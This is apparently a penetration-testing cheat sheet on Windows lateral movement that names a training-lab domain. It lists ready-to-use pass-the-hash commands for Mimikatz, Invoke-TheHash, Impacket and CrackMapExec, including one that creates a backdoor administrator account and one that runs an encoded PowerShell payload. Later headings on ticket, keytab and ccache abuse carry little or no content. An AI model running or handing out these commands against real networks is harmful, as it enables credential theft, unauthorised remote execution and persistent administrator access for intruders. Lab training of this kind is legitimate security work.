Windows Lateral Movement
Pass The Hash (Mimikatz)
mimikatz.exe privilege::debug "sekurlsa::pth /user:<user> /rc4:<hash> /domain:inlanefreight.htb /run:cmd.exe" exitPass The Hash (Invoke-TheHash)
# Import Module
Import-Module .\Invoke-TheHash.psd1
# Pass The Hash
Invoke-SMBExec -Target <IP> -Domain <domain> -Username <username> -Hash <hash> -Command "net user 0xF0rk Password123 /add && net localgroup administrators 0xF0rk /add" -Verbose
# With WMI
Invoke-WMIExec -Target DC01 -Domain <domain> -Username <user> -Hash <hash> -Command "powershell -e <base64 command>"Pass the Hash Impacket (Linux)
impacket-psexec administrator@<IP> -hashes :<hash>
Pass The Hash CrackMapExec (LInux)
crackmapexec smb <IP> -u Administrator -d . -H <hash> --local-authPass The Hash RDP
Harvesting Tickets From Windows
Pass the Key or OverPass the Hash
Pass the Ticket (PtT)
Pass The Ticket PowerShell Remoting
Pass The Ticket (From Linux)
Check Linux Machine Domain Joined
Find Keytab Files
Find ccache Files
A credential cache or ccache file holds Kerberos credentials while they remain valid and, generally, while the user's session lasts.
Abusing KeyTab Files
Keytab Extract
Abusing Keytab ccache
To abuse a ccache file, all we need is read privileges on the file. These files, located in /tmp, can only be read by the user who created them, but if we gain root access, we could use them.
Convert ccache file for Windows
Last updated